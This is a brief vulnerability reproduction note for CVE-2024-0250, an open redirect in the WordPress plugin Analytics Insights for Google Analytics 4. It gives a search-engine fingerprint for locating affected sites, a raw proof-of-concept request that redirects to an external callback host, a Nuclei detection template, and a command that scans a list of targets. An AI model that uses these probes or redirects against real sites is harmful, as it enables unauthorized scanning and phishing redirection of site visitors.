CVE-2024-0250 漏洞复现

body="/wp-content/plugins/analytics-insights"

GET /wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://ai8akwkt.eyes.sh/%3f&code=x HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.6.26Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

id: CVE-2024-0250
info:  name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect  author: securityforeveryone  severity: medium  description: |    The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.  remediation: |    Fixed in 6.3  reference:    - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/    - https://github.com/fkie-cad/nvd-json-data-feeds    - https://nvd.nist.gov/vuln/detail/CVE-2024-0250  classification:    epss-score: 0.00043    epss-percentile: 0.0866  metadata:    max-request: 1    verified: true    fofa-query: body="/wp-content/plugins/analytics-insights"    publicwww-query: "/wp-content/plugins/analytics-insights"  tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights
http:  - method: GET    path:      - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"
    matchers:      - type: regex        part: header        regex:          - '(?m)^(?:Locations*?:s*?)(?:https?://|//)?(?:[a-zA-Z0-9-_.@]*)oast.me.*$'# digest: 4a0a004730450220508ba6949e0997c93c3e04a75108bac0d84fd29cdf91842239f76d788c8d60f9022100bb118773932c0732f921c1e1dca30fa00cf7826b60410268e292e051434a276a:922c64590222798bb761d5b6d8e72950

nuclei.exe -t mypoc/cve/CVE-2024-0250.yaml -l data1.txt